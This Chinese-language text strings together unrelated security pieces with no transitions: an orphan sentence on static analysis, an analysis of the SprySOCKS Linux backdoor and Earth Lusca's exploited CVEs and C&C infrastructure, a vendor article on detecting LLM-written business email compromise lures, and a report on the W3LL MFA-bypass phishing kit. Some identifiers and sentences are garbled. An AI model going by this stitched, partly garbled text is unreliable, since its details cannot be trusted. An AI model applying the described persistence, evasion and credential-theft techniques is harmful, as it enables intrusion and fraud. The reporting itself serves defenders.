我們發現，很少有研究考慮到第三方庫的干擾，並提出剔除第三方庫的具體方案。如果不剔除這些庫，基於靜態分析的方法幾乎毫無意義，因為靜態抽取會抽取出大量未被調用的API

在跟踪分析Earth Lusca時，研究人員在攻擊者的服務器上發現了一個有趣的加密文件，即一個基於Linux的惡意程序，它似乎源於開源的Windows後門Trochilus，由於其快速的活動和SOCKS的實現，研究人員稱之為SprySOCKS。 早在2021年初，研究人員就發表了一篇研究論文，討論了一個與已有攻擊組織有關的運作，當時，研究人員追踪到該組織名為Earth Lusca。自研究人員進行初步研究以來，該組織一直保持活躍，甚至在2023年上半年還擴大了其攻擊範圍，目標是對世界各國都發起攻擊。 為此，研究人員還設法獲得了一個有趣的加密文件，該文件託管在攻擊者的傳播服務器上。研究人員在VirusTotal上找到了該文件的原始加載程序，並成功解密了它。有趣的是，解密後的有效負載是一個研究人員從未見過的以Linux為目標的後門。主執行例程及其字符串表明，它源於開源的Windows後門Trochilus，其中一些功能正在Linux系統中重新實現。研究人員將這個新的Linux變體命名為SprySOCKS，指的是Trochilus的快速行為和後門內的新套接字安全（SOCKS）實現。 對SprySOCKS後門的分析揭示了一些有趣的發現。後門包含一個引用後門版本號的標記。研究人員已經確定了兩個包含兩個不同版本號的SprySOCKS有效負載，這表明後門仍在開發中。此外，研究人員注意到交互式shell的實現可能受到了Derusbi惡意程序的Linux變體的啟發。 同時，SprySOCKS的命令和控制（CC）協議的結構與RedLeaves後門使用的協議類似，RedLeaves是一種遠程訪問木馬（RAT），針對Windows設備發起攻擊。它由兩個組件組成，加載程序和加密的主負載。加載程序負責讀取、解密和運行主負載。 與Windows版本類似，本文中分析的Linux變體也由這兩個組件組成。根據分析，RedLeaves也是基於Trochilus的公開源代碼構建的。 到目前為止，研究人員只觀察到了Earth Lusca使用的SprySOCKS。我們將在本文介紹更多關於Earth Lusca惡意程序的背景，以及對其組件和功能的全面分析。 最近的Earth Lusca活動Earth Lusca在2023年上半年仍然活躍，其攻擊主要集中在東南亞、中亞和巴爾幹半島的國家（對拉丁美洲和非洲國家的一些零星攻擊）。該組織的主要目標是涉及外交、技術和電信的政府部門。 Earth Lusca現在又將受害者面向公眾的服務器作為攻擊對象。此外，研究人員看到他們經常利用基於服務器的N天漏洞，包括（但不限於）以下漏洞： CVE-2022-40684，Fortinet FortiOS、FortiProxy和FortiSwitchManager中存在身份驗證繞過漏洞； CVE-2022-39952 ，Fortinet FortiNAC中存在未經驗證的遠程代碼執行（RCE）漏洞； CVE-2021-22205 ，GitLab CE/EE中存在未經驗證的RCE漏洞； CVE-2019-18935 ，ASP的Progress Telerik UI中存在未經驗證的遠程代碼執行漏洞.NET AJAX； CVE-2019-9670/CVE-2019-9621 ，Zimbra協作套件中未經驗證的RCE的兩個漏洞； ProxyShell（CVE-2021-34473、CVE-2021-3 4523v、CVE-202 1-31207），在Microsoft Exchange中執行未經身份驗證的RCE的一組三個漏洞。 Earth Lusca利用服務器漏洞滲透到受害者的網絡中，之後它將部署一個webshell並安裝Cobalt Strike進行橫向移動。該組織將洩露文件和電子郵件帳戶憑據，並進一步部署ShadowPad和Linux版本的Winnti等高級後門，對其目標進行長期間諜活動。 “mandibule”加載程序組件調查之初，研究人員觀察到一個名為libmonitor.so.2的文件託管在Earth Lusca的交付服務器上。在沒有先前上下文的情況下，這似乎是一個只包含隨機字節的二進製文件，這表明它很可能是一個加密的有效負載。研究人員使用唯一的文件名在VirusTotal上執行搜索，這使研究人員能夠識別相關的ELF文件（SHA256:65b27e84d9f22b41949e42e8c0b1e4b88c75211cbf94d5fd66edc4ebe21b7359），並將其命名為“mkmon”。 ELF文件可用於解密libmonitor.so.2文件並恢復其原始負載，從而證明“mkmon”是與libmonitor.so.2捆綁的加載程序。 加載程序並不是從零開始開發的，它的開發人員使用了一個公開的Linux ELF注入器，名為“mandible”（法語中下顎的意思）。最初的ELF注入器項目是一個命令行工具，能夠將有效負載進行自註入或註入另一個項目中。作為一個典型的命令行工具，它打印列出支持參數的用法文本。原始注入器還打印各種調試消息，以通知用戶有關注入的進度。 攻擊者使用mandibule項目作為其惡意程序加載程序的基礎。項目創建者刪除了使用屏幕和注入到其他進程的能力，然後添加了一個函數來加載和解密第二階段。研究人員認為這項工作做得很草率，因為開發人員沒有完全刪除調試消息，加載程序也沒有被利用，也就是說，它是用調試符號傳播的。事實上，攻擊者似乎只為使其能夠裝載有效負載而對原始注入器進行了最少的修改。 傳播調試信息的加載程序，請注意，存在“.debug*”部分 運行加載程序時顯示的調試消息 圖2中顯示的調試消息有兩個不同的標記。 “”標記來自原始mandibule項目，而“[+]”或“[-]”標記是由攻擊者添加到加載程序的調試消息。 加載程序進程的名稱由prctl命令設置為“kworker/0:22”。通常，kworker是內核工作線程的佔位符進程。然而，在這種情況下，“kworker”名稱與內核工作線程無關。相反，當用戶通過ps或top等命令列出所有正在運行的任務時，加載程序濫用這個名稱只是為了避免懷疑。 進程名稱設置為“kworker/0:22” 受感染設備上的“kworker*”進程列表，突出顯示的進程是分析的加載程序 加載器接受兩個命令行參數，加密的第二階段文件的路徑和自刪除標誌。第二階段使用AES-ECB密碼進行加密，密碼在加載器中進行硬編碼。 用於解密第二階段的函數 加載器還負責設置持久性。它將自己和加密的第二階段複製到/usr/sbin/目錄，請參閱調試說明“[+] rename loader ok” and “[+] rename server ok”。然後，它使用chkconfig或systemd將加載程序作為服務啟動。如果自刪除標誌設置為“1”，則最初執行的加載程序和加密的階段文件都將被刪除。 SprySOCKS組件在檢查解密的第二階段時，可見的字符串顯示它是用HP Socket項目靜態編譯的，這是一個源自中國的高性能網絡框架。 可見字符串中的HP Socket引用 初始化過程顯示了一個硬編碼的AES-ECB密碼，用於加密與CC服務器的通信。 用於CC通信的AES密碼 CC地址和端口也在模塊中進行了硬編碼，但它們沒有加密，並且以純文本形式可見。 CC服務器和端口配置 CC通信由通過TCP（傳輸控制協議）發送的數據包組成。數據包的標頭由0x12字節組成，後面是base64編碼的AES ECB加密消息。與之前對RedLeaves惡意程序的分析中的表B-2類似，標頭部分包含一些隨機和硬編碼的值，加上有效負載的長度（下圖中用藍色突出顯示）。 從受害者的設備發送到CC服務器的數據包示例 0xACACBCBBC的固定值，發生在偏移量為4-7的發送數據包中 原始Trochilus中使用的固定值為0xAFAFBFBF，而在RedLeaves變體中使用的是0xBFD9CBAE。 在解碼和解密消息後，它會顯示諸如“__handler”, “__msgid”, “__serial”和“clientid”之類的關鍵字。其中一些關鍵字可以在Trochilus中找到，但更重要的是，這些消息與RedLeaves通信協議非常相似。 解碼和AES ECB解密消息 RAT實現了幾個標准後門命令，包括收集系統信息、啟動交互式shell、列出網絡連接、創建SOCKS代理、上傳和下載文件以及其他基本文件操作（列出、刪除、重命名和創建目錄）。下圖顯示了消息ID以及與消息相關的函數的大致描述。 已處理消息列表及其函數說明 獲取設備信息（CollectInfo） 客戶端信息結構類似於Trochilus使用的原始client_INFO結構，其中一些參數與研究人員分析的惡意程序相同。還值得注意的是參數“cpufrep”，它可能是“cpufreq”（CPU頻率）的拼寫錯誤。 “ClientInfoCallbacks.h”中的CLIENT_INFO結構，它是Trochilus RAT 在ClientInfoManager.cpp（Trochilus RAT）中，你可以看到CLIENT_INFO結構中參數的內部名稱。請注意，它們中的大多數具有與上圖中列出的參數相同的值。此外，“cn”、“ip”、“groups”、“vercode”、“priv”、“lang”、“mem”、”os“、”x64“和”cpufrep“是相同的。 “ClientInfoCallbacks.h”中的CLIENT_INFO結構，它是Trochilus RAT SprySOCKS的CLIENT_INFO結構中的字段列表 交互式shell當客戶端被請求創建交互式終端時，它首先與偽終端（PTY）子系統（/dev/ptmx）的主終端進行交互。然後，在/dev/pts目錄中創建一個具有唯一設備節點名稱的新從屬PTY。 之後，將啟動一個execve命令，其中包含參數“[diskio]”、指示其不保存會話歷史記錄的環境變量（HISTFILE=/dev/null）以及包含當前用戶名（u）、計算機主機名（h）和工作目錄（w）-（PS1=\\u@\\h:\\w\\$）的提示字符串（PS1）。 交互式shell的創建 在搜索上述字符串時，可以找到與Linux版本的Derusbi匹配的YARA規則的引用。攻擊者很可能是從其他惡意程序使用的技術中獲得靈感，甚至可能直接訪問了Derusbi源代碼本身。 客戶端ID生成器 環境ID（客戶端ID）由兩個組件組成。第一部分是第一個列出的接口的MAC地址，長度為6字節，惡意程序獲得第一個列出接口，但如果該接口是“環回接口（loopback interface）”，則跳過該接口並考慮下一個接口，當轉換為十六進製字符串時，其長度為12字節。第二部分對應處理器函數，由使用“CPUID_GETFEATURES”參數調用的CPUID指令返回。生成結果的長度為8個字節，當轉換為十六進製字符串時，其長度為16字節。因此，生成的客戶端ID具有14個字節，並且在轉換為十六進製字符串之後，它具有28個字節。 幕後組織 研究人員在2023年6月初觀察到託管在傳播服務器207[.]148[.]75[.]122上的加密SprySOCKS有效負載。該服務器由Earth-Lusca攻擊者運營，還向目標傳播了Cobalt Strike和Linux版本的Winnti的可執行文件。 SprySOCKS有效負載包含版本號（1.3.6）和CC域lt76ux[.]confenos[.]shop。研究人員在VirusTotal上發現其他用戶上傳的另一個SprySOCKS有效負載，版本號為1.1，它連接到CC域2e6veme8xs[.]bmssystemg188[.]us。值得注意的是，同級域rvxzn49eghqj[.]bmssystemg188[.]us被解析為38[.]60[.]199[.]208，與793tggz7mw91[.]itcom666[.]live重疊。 itcom666[.]live域是一個已知的CC域，由Earth Lusca開發。 總結我們在本文介紹了Earth Lusca使用的新後門SprySOCKS，它擴展了該組織的Linux武器庫。最近，攻擊者通過利用已知漏洞，攻擊了受害者面向公眾的服務器。 所以，各類組織應主動管理其攻擊面，最大限度地減少進入其係統的潛在入口點，並降低被成功突破的可能性。企業應定期應用修復程序並更新其工具、軟件和系統，以確保其安全性、功能性和整體性能。

人工智能領域的最新進展導致了大語言模型（LLM）問世，包括GPT-3、PaLM、GPT-4和LLAMA。這些模型可以生成易於理解的文本段落、回答詳細的問題、解決複雜的問題、編寫代碼以及處理其他各種自然語言任務。 LLM徹底改變了自然語言處理（NLP）任務，改變了用戶與語言進行交互的方式，最終通過改進後的聊天機器人、虛擬助手、內容生成、搜索引擎和語言學習平台，影響了人們的日常生活。 雖然不可否認LLM進步巨大，有助於日常使用，但在網絡安全領域，它已成為一把雙刃劍，無意中為網絡犯罪分子開創了黃金時代。 LLM允許攻擊者更高效更頻繁地進行一系列攻擊（包括魚叉式網絡釣魚和商業電子郵件入侵等社會工程伎倆），因為它能夠立即生成數千條獨特的明文攻擊消息。好消息是，LLM並非沒有缺陷，尤其在用於生成攻擊時。 我們在本文中將探討防御者如何利用LLM對抗由同樣的LLM生成的攻擊。 LLM攻擊：形式不同，實質相同不妨先從分析三封電子郵件入手，每封郵件發送給我們保護的不同組織的用戶。這些惡意電子郵件都是商業電子郵件入侵（BEC）攻擊，攻擊者通常冒充一家公司的高層人員，比如首席執行官或首席財務官，並指示員工購買禮品卡以獎勵同事。 電子郵件1： （圖1) 電子郵件2： (圖2) 電子郵件3： (圖3) 如果你仔細看一下這些郵件，就會發現有著顯著的相似之處，如下所述： 相似之處 例子1 例子2 例子3 讚賞信息 忠誠和努力創造美好未來 美妙過程、努力、忠誠和專注打動了高層管理人員 美妙過程、努力、忠誠和專注打動了我 行動 送禮品卡，給一些員工以驚喜 送禮品卡，給一些高級員工以驚喜 送禮品卡，給一些員工以驚喜 要求保密 要求你保密，以免敗壞這份驚喜的效果 要求你保密，以免敗壞份驚喜的效果 要求你保密，以免敗壞這份驚喜的效果 潛在的禮品卡 Amex、維薩和塔吉特 Amex、維薩和亞馬遜 維薩、塔吉特和Amex 請求協助 想听聽意見，了解最近的商店，為我迅速購買禮品 想听聽意見 你能找到的最近商店，為我迅速購買禮品 簽收 一收到該電子郵件請回复，致以新年問候 一收到該電子郵件請回复，致以感恩節問候 期待你的回复，致以美好祝愿 從注意到的相似之處來看，可以假定電子郵件使用了模板。此外，易於識別的模式可以歸因於LLM的訓練過程。 當LLM接受訓練時，它接觸到大量的文本數據，使其能夠學習和內化模式。這些模式包括常見的語言結構、短語和內容元素。因此，當受過訓練的模型用於生成文本時，它會藉鑑這學習到的知識，並將這些模式整合到輸出中，從而導致熟悉的主題和內容元素重複出現。 LLM防禦？ LMKPerception Point利用了LLM生成的文本中的模式，並用LLM來增強威脅檢測。為了做到這一點，我們使用了transformer，這種高級模型可以理解文本的含義和上下文，LLM也使用了這種高級模型。 使用transformer，我們可以執行文本嵌入，這個過程通過捕獲文本的語義本質，將文本編碼成數字表示。我們使用先進的聚類算法對語義內容密切相關的電子郵件進行分組。通過聚類，我們可以訓練模型來區分屬於同一聚類的電子郵件。這使模型能夠學習和識別由LLM生成的內容中的模式。 當新的電子郵件進入我們的高級威脅防護平台時，模型會掃描其內容，以確定它是否是由LLM生成以及它被惡意使用的可能性。如果發現生成的文本是惡意文件，模型將提供潛在攻擊的詳細信息。 說到檢測人工智能生成的惡意電子郵件，還存在另外一個與誤報判定有關的障礙。如今，許多合法的電子郵件都是藉助ChatGPT等生成式人工智能工具構建的，其他電子郵件常常是由含有重複短語的標準模板構建的（新聞通訊、營銷電子郵件和垃圾郵件等），這些模板與LLM模型的結果非常相似。 我們新模型的顯著特點之一是它的三階段架構，專門設計用於最大限度地檢測由LLM生成的任何有害內容，同時保持極低的誤報率。 在第一階段，模型賦予0到1之間的分數，以評估內容由人工智能生成的概率，然後模型切換到分類模式。借助先進的transformer和完善後的聚類算法，內容被分為多個類別，包括BEC、垃圾郵件和網絡釣魚。再提供0到1之間的分數，標記內容屬於這些類別的概率。 第三個也是最後一個階段融合了前兩個階段的評估結果，並補充了數字特徵，比如發送方信譽評分、身份驗證協議（DKIM、SPF、DMARC）以及我們收集的其他證據。基於這些輸入信息，模型對內容由人工智能生成的可能性以及它是惡意內容、垃圾郵件還是乾淨內容做出最終預測。 為了查看實際運行的模型，我們讓ChatGPT編寫一封示例電子郵件： (圖4） 如你所見，輸出含有用於個性化的括號。接下來，我們將生成的文本發送給模型，沒有括號。值得一提的是，對於下面的所有示例，階段3中提到的幾十個數值都被視為郵件是從新的發件人發送的。 （圖5） 模型返回的置信度分數為0.96，將該內容描述為潛在的BEC攻擊，具體是使用禮品卡請求從受害者那裡竊取資金的郵件。 然後，我們測試了模型在面對生成較長的文本時的表現： （圖6） （圖7） （圖8） 就像針對較短文本的初始判定一樣，模型還將生成的較長文本分類為潛在的BEC禮品卡攻擊，得分為0.92。 為了進一步測試模型，我們隨後讓ChatGPT撰寫一封電子郵件，要求收件人提供W-2表格。這是一種廣泛使用的社會工程攻擊，因為W-2表格用於報告員工的年薪以滿足稅收要求。對於網絡犯罪分子來說，這無異於一座金礦，擁有豐富的個人和財務信息，可用來進行身份盜竊、稅務欺詐，甚至用於更複雜的社會工程攻擊。 以下是ChatGPT給出的答案： （圖9） （圖10） （圖11) 即使我們給了ChatGPT更詳細的說明，模型仍然可以正確地對內容進行分類——在這種情況下，將其分類成潛在的W2社會工程攻擊，得分為0.87。 結語我們在本文中探討了網絡防御者如何利用LLM生成的攻擊存在的漏洞和局限性。通過了解這些弱點，防御者就可以製定有針對性的緩解策略，並利用LLM作為消除威脅的寶貴工具,積極採用主動性、適應性的方法，防御者可以加強防禦，比攻擊者領先一步。

一夥名為W3LL的威脅分子開發了一個可以繞過多因素身份驗證的網絡釣魚工具包，還開發了入侵8000多個Microsoft 365企業帳戶的其他工具。 安全研究人員發現，在10個月內，W3LL的實用程序和基礎設施被用來搭建大約850個獨特的網絡釣魚網站，攻擊了56000餘個Microsoft 365帳戶的憑據。 發展壯大業務W3LL的定製網絡釣魚工具的服務對像是由至少500名網絡犯罪分子組成的社區，被用於商業電子郵件入侵（BEC）攻擊，造成了數百萬美元的經濟損失。 研究人員表示，W3LL的工具包幾乎涵蓋BEC行動的整條殺傷鏈，可以由“各種技術水平的網絡犯罪分子”操控。 網絡安全公司Group-IB在今天的一份報告中提供了有關W3LL的詳細信息，以及它如何發展成為對BEC組織而言最先進的惡意開發者之一。 表明W3LL活動的第一個證據似乎來自2017年，當時開發者開始提供一個用於電子郵件批量發送的自定義工具：W3LL SMTP Sender，用於發送垃圾郵件。 當開發者開始銷售針對Microsoft 365公司帳戶的定製網絡釣魚工具包時，這夥威脅分子的人氣和業務開始增長。 研究人員表示，2018年，W3LL推出了W3LL Store（說英文的交易平台），它可以在這裡向封閉的網絡犯罪分子社區推廣和銷售其工具。 Group-IB表示：“W3LL的主要武器W3LL Panel可以被認為是同類中最先進的網絡釣魚工具包之一，擁有中間攻擊者功能、API、源代碼保護及其他獨特功能。” 用於BEC攻擊的W3LL武器庫除了旨在繞過多因素身份驗證（MFA）的W3LL Panel外，威脅分子還提供了另外16個工具，所有這些工具都用於BEC攻擊。目錄包括如下： •SMTP發送工具PunnySender和W3LL Sender •惡意鏈接加載器（stager）W3LL Redirect •一個名為OKELO的漏洞掃描器 •一個名為CONTOOL的帳戶自動發現實用程序 •一個名為LOMPAT的電子郵件驗證器 據Group-IB聲稱，W3LL Store提供了部署BEC攻擊的解決方案，從挑選受害者的初始階段，帶武器化附件（默認或定制）的網絡釣魚誘餌，到發送進入到受害者收件箱中的網絡釣魚郵件。 研究人員表示，W3LL有足夠嫻熟的技術，可以通過將工具部署和託管在受感染的Web服務器和服務上，保護工具不被檢測或關閉。 然而，客戶也可以選擇使用W3LL的OKELO掃描器來查找易受攻擊的系統，並自行獲得訪問權限。 圖1. 使用W3LL工具的BEC攻擊殺傷鏈（圖片來源：Group-IB） 繞過過濾器和安全代理W3LL用來繞過電子郵件過濾器和安全代理的一些技術包括針對電子郵件標題和文本主體（Punycode、HTML標籤、圖像和遠程內容鏈接）的各種混淆方法。 初始網絡釣魚鏈接也使用多種逃避檢測的方法來投遞。一種方法是通過網絡釣魚附件，而不是通過將它們嵌入在電子郵件正文中。 研究人員發現，鏈接被放在一個作為附件出現的HTML文件中。當受害者啟動惡意的HTML（可能偽裝成文檔或語音信息）時，會打開一個瀏覽器窗口，顯示“看起來像真的MS Outlook動畫”。 這是準備收集Microsoft 365帳戶憑據的W3LL Panel網絡釣魚頁面。 Group-IB分析了在野外發現的W3LL網絡釣魚附件後，注意到它是一個HTML文件，通過使用借助base64編碼混淆的JavaScript，在iframe中顯示了網站。 圖2. 在野外觀察到的W3LL網絡釣魚附件（圖片來源：Group-IB） 在6月底更新的新版本中，W3LL添加了多層混淆和編碼。它直接從W3LL Panel加載腳本，而不是將其包含在HTML代碼中。 最新版變體的事件鍊是這樣的： 圖3. 更新後的W3LL網絡釣魚附件（圖片來源：Group-IB） 劫持Microsoft 365企業帳戶Group-IB研究人員解釋，網絡釣魚誘餌中的初始鏈接並不導致W3LL Panel中虛假的Microsoft 365登錄頁面，它只是一條重定向鏈的開始，旨在防止發現W3LL Panel網絡釣魚頁面。 W3LL為了入侵Microsoft 365帳戶，使用了中間攻擊者/中間人（AitM/MitM）技術，即受害者和Microsoft服務器之間的通信通過W3LL Panel進行，W3LL Store充當後端系統。 目標是獲取受害者的身份驗證會話cookie。為了實現這一點，W3LL Panel需要經過幾個步驟，其中包括： •通過CAPTCHA驗證 •創建正確的虛假登錄頁面 •驗證受害者的帳戶 •獲得目標組織的品牌標識 •獲取登錄過程的cookie •識別帳戶類型 •驗證密碼 •獲取一次性密碼（OTP） •獲取完成身份驗證的會話cookie 在W3LL Panel獲得身份驗證會話cookie後，該帳戶被入侵，並向受害者顯示一個PDF文檔，讓登錄請求看起來合法。 帳戶發現階段使用CONTOOL，攻擊者可以自動查找受害者使用的電子郵件、電話號碼、附件、文檔或URL，這可能有助於橫向移動階段。 該工具還可以監控、過濾和修改入站電子郵件，以及根據特定關鍵字接收Telegram帳戶通知。 據Group-IB聲稱，這種攻擊的典型結果是： •數據盜取 •附有攻擊者付款信息的虛假髮票 •冒充專業服務人員向客戶發送欺詐性付款請求 •典型的BEC欺詐——訪問高管帳戶，並代表他們指示員工進行電匯或購物 •分發惡意軟件 牟取錢財Group-IB的報告深入研究了W3LL Panel的功能，從技術層面描述了一些功能如何實現預期目的，無論是逃避檢測還是收集數據。 W3LL Panel在開發者眼裡就是“皇冠上的寶石”，三個月收費500美元，每月續訂價格為150美元。還必須購買許可證以激活它。 以下是購買工具包和管理面板的頁面： 圖4. W3LL Store和W3LL Panel管理（圖片來源：Group-IB） W3LL威脅分子已經存在了大約五年，積累了超過500名網絡犯罪分子的客戶群，有超過12000種工具可供選擇。 除了網絡釣魚和BEC相關的工具外，W3LL還提供權限，以便訪問被入侵的Web服務（web shell、電子郵件和內容管理系統）、SSH及RDP服務器、託管及雲服務帳戶、企業電子郵件域、VPN帳戶以及被劫持的電子郵件帳戶。 Group-IB的研究人員表示，在2022年10月至2023年7月這段期間，W3LL賣出了3800多個工具，估計營業額超過了50萬美元。